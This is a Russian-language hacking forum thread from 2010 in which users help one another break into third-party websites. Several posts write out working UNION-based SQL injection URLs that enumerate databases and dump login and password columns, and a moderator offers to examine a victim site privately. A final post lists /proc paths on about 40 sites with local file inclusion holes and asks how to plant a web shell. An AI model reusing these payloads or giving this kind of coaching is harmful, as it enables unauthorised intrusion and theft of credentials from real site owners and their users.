ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11201  
Старый 13.01.2010, 01:05
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от a1ertso  
Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .
http://forum.antichat.ru/thread104591.html =\\\\
 
Ответить с цитированием

  #11202  
Старый 13.01.2010, 03:39
Аватар для Imperou$
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от S00pY  
Попробуй # в urlencode
Пробовал также. В общем видимо иньекция действительно в лимите.Я вроде где то тут читал,что можно обойти, если ткнёте, буду признателен.Не могу найти. Или глючит =)
 
Ответить с цитированием

  #11203  
Старый 13.01.2010, 04:53
Аватар для Ayowa
Ayowa
Новичок
Регистрация: 25.12.2009
Сообщений: 10
Провел на форуме:
76178

Репутация: 30
По умолчанию

Цитата:
Сообщение от a1ertso  
Есть скуль, версия 5, узнал нужную таблицу, колонки в ней, но когда делаю запрос вида:
site.ru/news.php?id=-1+union+select+version(),2,3+from+uzzerss-- кроме ошибки ничего не вижу... В чем может быть проблема? пробовал перевести в хэкс колонку и версию, но ничего толкового не вышло .
Имхо тут два варианта:
1. Либо нет доступа к самой таблице.
2. Либо табла находится в другой базе. Чтоб узнать базу пишем
asd.ru/yo.php?yo=-123+union+select+1,2,table_schema,4+from+informati on_schema.tables+where+table_name=0x757a7a65727373 +--+
Ну и соответственно выбираем union+select+1,2,group_concat(concat_ws(0x3a,log,p ass)),4+from+[table_schema].uzzerss+--+
 
Ответить с цитированием

  #11204  
Старый 13.01.2010, 12:59
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Я чайник, по шаблону не получаеццо =((
в общем ситуация такая... делпю запрос
Цитата:
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(database(),0x3 A,user(),0x3A,version()),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22+--
получаю это вот tava:root@localhost:5.0.27
Кодирую tava в 16-тиричную систему, получаю это 0x74617661
Делаю запрос на таблицы этой бд
Цитата:
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x0b)+FROM+information_schema.tables+WHERE+ table_schema=0x74617661,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+--
и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....

Последний раз редактировалось sqlinjector; 13.01.2010 в 13:02..
 
Ответить с цитированием

  #11205  
Старый 13.01.2010, 13:31
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от sqlinjector  
Я чайник, по шаблону не получаеццо =((
в общем ситуация такая... делпю запрос

получаю это вот tava:root@localhost:5.0.27
Кодирую tava в 16-тиричную систему, получаю это 0x74617661
Делаю запрос на таблицы этой бд

и мне пишут ошибку mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /data/www/.....
ввв.бла-бла-бла.ком/ID=1309+union+select+1,group_concat(table_name+SEP ARATOR+0x3a),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22+FROM+information_schema .tables+WHERE+ table_schema=0x74617661--
 
Ответить с цитированием

  #11206  
Старый 13.01.2010, 13:51
Аватар для sqlinjector
sqlinjector
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679

Репутация: 10
По умолчанию

Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

Это с правами свфязано или запрос некорретный всетаки ?
 
Ответить с цитированием

  #11207  
Старый 13.01.2010, 14:08
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от sqlinjector  
Спасибо Ctacok, понял свой косяк.. набрал ссылочку и получил эти вот ошибки..
Warning: extract() [function.extract]: First argument should be an array in /data/www/.../details.php on line 12...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 40...
Warning: Invalid argument supplied for foreach() in /data/www/.../details.php on line 121...

Это с правами свфязано или запрос некорретный всетаки ?
Скинь в пм линк сайта, посмотрю.
 
Ответить с цитированием

  #11208  
Старый 13.01.2010, 14:19
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Цитата:
detail.php?EventID=-88+union+select+1,2,group_concat(table_name),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 +FROM+information_schema.tables+where+table_schema =0x74617661
 
Ответить с цитированием

  #11209  
Старый 13.01.2010, 14:40
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Ок.
Цитата:
detail.php?ID=34&MID=1400+union+select+1,group_con cat(table_Name+Separator+0x3a),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+from+information _schema.tables+WHERE+table_schema=0x74617661--
Тот же сайт к сведению,просто там другая страница была.Кстати нормально всё работает,видимо он пробелы не удалил.
 
Ответить с цитированием

  #11210  
Старый 14.01.2010, 20:04
Аватар для Alf0x0ns
Alf0x0ns
Новичок
Регистрация: 12.01.2010
Сообщений: 13
Провел на форуме:
61009

Репутация: 18
По умолчанию

нашел:
Где-то с 40 сайтов на которых присутствует уязвимость LFI:
На большой части с них присутствуют:
Код:
/proc/self/environ
/proc/self/status
/proc/self/fd/2
/proc/self/fd/7
/proc/self/fd/10
/proc/version
/proc/self/cmdline
/proc/devices
Практичыске я проверил вручную большую часть найденных уязвимостей на залития шелла.
Что и не дало ни 1 жданного результата (true).

Вопрос: с тех директорий что я показал выше на все из них можно заливать шелл?
Вопрос2: как узнавать директорию в которую нужно заливать шелл, если вывода ошибки нет!
Пока все!)

Последний раз редактировалось Alf0x0ns; 14.01.2010 в 23:06..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ